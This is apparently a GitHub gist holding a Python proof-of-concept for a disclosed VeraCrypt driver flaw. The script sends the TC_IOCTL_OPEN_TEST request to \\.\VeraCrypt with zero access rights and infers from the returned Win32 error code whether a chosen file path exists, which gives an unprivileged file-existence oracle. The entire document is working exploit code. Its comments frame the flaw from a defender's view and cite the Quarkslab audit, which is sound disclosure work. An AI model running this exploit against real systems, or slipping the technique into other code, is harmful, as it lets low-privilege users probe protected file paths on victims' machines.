
@xpn
Last active December 21, 2019 07:27
#!/usr/bin/env python
import sys
from ctypes import *
# --- Inputs to CTL_CODE(): device type, transfer method, required access ---
FILE_DEVICE_UNKNOWN = 0x22
METHOD_BUFFERED = 0
# FILE_ANY_ACCESS means the I/O manager asks for no read/write right on the
# device handle before the request is passed to the driver.
FILE_ANY_ACCESS = 0

# --- Buffer sizes used by OPEN_TEST_STRUCT ---
TC_MAX_PATH = 260       # length, in wide characters, of the DeviceName field
VOLUME_MAX_SIZE = 32    # length, in bytes, of the volumeID field

# --- CreateFile arguments ---
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3

# --- Target device and request ---
DRIVER_NAME = "\\\\.\\VeraCrypt"    # Win32 device path of the VeraCrypt driver
TC_IOCTL_OPEN_TEST = 13             # function index; TC_IOCTL() adds 0x800 to it
def CTL_CODE(DeviceType, Function, Method, Access):
    """Build a Windows I/O control code from its four fields.

    Same bit layout as the CTL_CODE macro in the Windows headers:
    device type from bit 16, required access from bit 14, function
    number from bit 2, transfer method in the low two bits. No masking
    is applied, so an out-of-range field spills into its neighbours.
    """
    device_bits = DeviceType << 16
    access_bits = Access << 14
    function_bits = Function << 2
    return device_bits | access_bits | function_bits | Method
def TC_IOCTL(Code):
    """Return the full control code for driver function index ``Code``.

    The index is offset by 0x800 and combined with FILE_DEVICE_UNKNOWN,
    METHOD_BUFFERED and FILE_ANY_ACCESS. Because the access field is
    FILE_ANY_ACCESS, any handle to the device is enough to send the
    request; whatever authorisation applies has to happen in the driver.
    """
    function_number = 0x800 + (Code)
    return CTL_CODE(
        FILE_DEVICE_UNKNOWN,
        function_number,
        METHOD_BUFFERED,
        FILE_ANY_ACCESS,
    )
class OPEN_TEST_STRUCT(Structure):
    """Buffer sent to, and received from, the driver for TC_IOCTL_OPEN_TEST.

    Byte-packed (``_pack_ = 1``), so ctypes inserts no padding between
    fields. Only ``DeviceName`` is filled in by this script; every other
    field keeps its zero-initialised value.
    NOTE(review): the field names presumably mirror the driver's own
    structure -- confirm the layout against the VeraCrypt driver headers.
    """

    _pack_ = 1
    _fields_ = [
        # Path the driver is asked to open, as a fixed-size wide string.
        ("DeviceName", c_wchar * TC_MAX_PATH),
        ("bDetectTCBootLoader", c_int),
        ("TCBootLoaderDetected", c_int),
        ("DetectFilesystem", c_int),
        ("FilesystemDetected", c_int),
        ("bMatchVolumeID", c_int),
        ("volumeID", c_char * VOLUME_MAX_SIZE),
        ("VolumeIDMatched", c_int),
    ]
if __name__ == "__main__":
    # Proof of concept for the file-existence oracle in the VeraCrypt
    # driver's TC_IOCTL_OPEN_TEST request (see the Quarkslab audit linked
    # in the banner below).
    #
    # Defender's view of what the script shows:
    #   * the device is opened with a desired-access mask of 0, and the
    #     control code is built with FILE_ANY_ACCESS, so the caller needs
    #     no read or write right on the device to send the request;
    #   * the answer is read purely from the Win32 error code, with one
    #     distinct outcome for "exists" and one for "does not exist";
    #   * the observable behaviour is a process opening \\.\VeraCrypt and
    #     issuing DeviceIoControl against it.
    # The fix belongs in the driver; the audit report covers remediation.
    #
    # The script targets Python 2. A parenthesised single-argument print
    # behaves the same there as the bare print statement.
    print("\nPOC for VeraCrypt TC_IOCTL_OPEN_TEST vulnerability")
    print(" Created by @_xpn_")
    print(" Report from Quarkslab can be found at:\n https://ostif.org/the-veracrypt-audit-results/\n")

    if len(sys.argv) != 2:
        print("Usage: %s FULL_PATH" % (sys.argv[0]))
        quit(1)

    share_mode = FILE_SHARE_READ | FILE_SHARE_WRITE
    h_driver = windll.kernel32.CreateFileA(DRIVER_NAME, 0, share_mode, None, OPEN_EXISTING, 0, None)

    # -1 is INVALID_HANDLE_VALUE as seen through ctypes' default int return.
    if h_driver == -1:
        print("[X] Error Opening Driver: %s" % (DRIVER_NAME))
        print("[X] Make sure that VeraCrypt has been installed")
        quit(1)

    print("[-] Opened Driver (%s) Successfully" % (DRIVER_NAME))

    # The same structure serves as input and output buffer; only the path
    # is populated, prefixed with the \dosdevices\ object directory.
    request = OPEN_TEST_STRUCT()
    request.DeviceName = u"\\dosdevices\\" + sys.argv[1]
    request_size = sizeof(request)
    bytes_returned = c_ulong()
    control_code = TC_IOCTL(TC_IOCTL_OPEN_TEST)

    succeeded = windll.kernel32.DeviceIoControl(h_driver, control_code, request, request_size, request, request_size, byref(bytes_returned), None)
    # Must stay immediately after the call, since the verdict depends on it.
    # NOTE(review): ctypes documents use_last_error / get_last_error() as the
    # reliable way to read this value; a direct GetLastError() call may be
    # stale. The handle is also never closed.
    last_error = windll.kernel32.GetLastError()

    ERROR_SUCCESS = 0
    ERROR_FILE_NOT_FOUND = 2
    ERROR_INVALID_NAME = 123

    if succeeded > 0 and last_error == ERROR_SUCCESS:
        print("[-] File exists")
    elif succeeded == 0 and last_error == ERROR_FILE_NOT_FOUND:
        print("[-] File does not exist")
    elif succeeded == 0 and last_error == ERROR_INVALID_NAME:
        print("[X] Error: Invalid path provided")
    else:
        print("[X] Unknown error:\n\tDeviceIOControl result: %d\n\tGetLastError result: %d\n" % (succeeded, last_error))